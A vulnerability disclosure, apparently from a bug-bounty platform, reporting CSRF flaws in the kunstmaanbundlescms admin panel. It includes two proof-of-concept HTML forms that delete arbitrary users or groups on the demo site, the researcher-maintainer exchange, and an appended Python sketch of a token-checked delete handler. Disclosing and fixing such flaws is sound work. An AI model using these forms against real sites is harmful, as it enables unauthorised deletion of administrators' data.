Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms

Valid

Reported on

Oct 17th 2021


Description

There exist multiple high-impact CSRFs with which an attacker can delete many parts of the application's contents.

I provide the full list of CSRF-vulnerable endpoints for you.

(Because there are too many endpoints, I don't include the PoC.html for all of the vulnerable endpoints.)

Occurrences

delete any blog tag

delete any blog author

Delete any Bike

delete any user

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/users/{id}/delete">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with user id

delete any group

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/groups/{id}/delete?delete=">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with groups id

delete any blog category

We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 months ago
amammad
2 months ago

Researcher


These CSRFs can cause high-impact damage to the admin panel; please don't reduce the bounty amount.

Thanks so much.

2 months ago

Maintainer


Hi @amammad, thanks for the report!

@admin should I mark this issue as valid or not? The "base issue" was already reported in a separate vulnerability report and that one was marked as valid. The difference is that this report lists more locations where this security issue can be exploited.

Jamie Slome
2 months ago

Admin


If you believe the new occurrences, i.e. permalinks, point to unaddressed points of failure, feel free to mark this report as valid, yes.

amammad
2 months ago

Researcher


Hey @maintainer

Just tell me to remove the repetitive endpoints.

amammad
2 months ago

Researcher


@maintainer I carefully found all vulnerable endpoints to make you aware of all occurrences.

Please, if there isn't any problem, just validate my report too.

Best regards.

kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
kunstmaan/kunstmaanbundlescms maintainer confirmed that a fix has been merged on 4f5612 a month ago
The fix bounty has been dropped
Author.php#L1-L19 has been validated
Category.php#L1-L21 has been validated
Tag.php#L1-L21 has been validated
RedirectRouter.php#L1-L219 has been validated
User.php#L1-L22 has been validated
PagePartAdmin.php#L1-L387 has been validated
Bike.php#L1-L171 has been validated
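
Added example, not part of the original report and not the project's own code: the PoC forms above carry no method attribute (so the browser sends GET) and no token field, so a delete route that answers only POST and checks a session-bound token rejects them. The sketch below is framework-agnostic; `handle_delete`, `issue_token`, the `_token` field name and the session ids are assumptions made for illustration, and only the path shape is taken from the report.

```python
import hashlib
import hmac
import re
import secrets

SECRET = secrets.token_bytes(32)  # per-deployment signing key (constructed for the demo)
# Path shape from the report's PoC; everything else here is hypothetical.
DELETE_USER = re.compile(r"/en/admin/settings/users/(\d+)/delete")


def issue_token(session_id: str, intent: str) -> str:
    """Token bound to one session and one action, e.g. 'delete-user-7'."""
    msg = f"{session_id}:{intent}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def handle_delete(method: str, path: str, form: dict, session_id: str) -> int:
    """Return the HTTP status a hardened delete route would answer with."""
    match = DELETE_USER.fullmatch(path)
    if match is None:
        return 404
    if method != "POST":
        return 405  # a state change must not be reachable through GET
    expected = issue_token(session_id, f"delete-user-{match.group(1)}")
    supplied = str(form.get("_token", ""))
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403  # token missing, forged, or issued for another session/action
    return 204  # the deletion itself would run here


def demo() -> dict:
    """Replay constructed requests, including the shape the PoC form produces."""
    sid, path = "sess-A", "/en/admin/settings/users/7/delete"
    token = issue_token(sid, "delete-user-7")
    return {
        "poc_get_form": handle_delete("GET", path, {"delete": ""}, sid),
        "cross_site_post": handle_delete("POST", path, {"delete": ""}, sid),
        "token_for_other_id": handle_delete(
            "POST", "/en/admin/settings/users/8/delete", {"_token": token}, sid),
        "token_from_other_session": handle_delete(
            "POST", path, {"_token": token}, "sess-B"),
        "legitimate_admin": handle_delete("POST", path, {"_token": token}, sid),
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

Binding the token to both the session and the specific action means a token captured for one delete cannot be replayed against another record or another admin's session.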